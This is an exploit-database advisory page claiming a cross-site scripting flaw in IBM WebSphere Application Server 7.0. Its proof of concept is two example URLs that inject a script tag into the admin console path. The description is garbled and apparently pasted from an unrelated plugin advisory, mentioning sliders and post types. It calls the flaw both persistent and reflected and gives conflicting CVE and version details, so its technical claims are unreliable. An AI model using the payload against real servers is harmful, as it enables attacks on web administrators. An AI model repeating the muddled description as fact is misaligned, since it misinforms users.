IBM Websphere Application Server 7.0 Cross Site Scripting

2022.12.05
Credit: Milad Karimi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: IBM Websphere Application Server 7.0 - Persistent Cross-Site Scripting (Authenticated) # Date: 2022-12-02 # Author: Milad karimi # Software Link: https://www.ibm.com/support/pages/6107-websphere-application-server-v61-fix-pack-7-windows # Version: 7.0 # Tested on: Windows 10 # CVE: 2009-0855 1. Description: This plugin creates a IBM Websphere Application Server from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script> http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>.jsp


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top